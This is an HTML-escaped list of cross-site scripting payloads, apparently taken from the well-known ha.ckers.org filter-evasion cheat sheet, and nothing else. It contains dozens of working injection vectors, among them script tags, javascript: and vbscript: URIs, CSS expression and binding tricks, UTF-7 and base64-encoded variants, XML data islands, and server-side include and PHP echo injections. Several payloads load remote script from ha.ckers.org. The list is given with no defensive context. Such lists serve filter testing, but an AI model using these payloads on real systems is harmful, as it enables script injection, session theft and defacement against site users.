&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
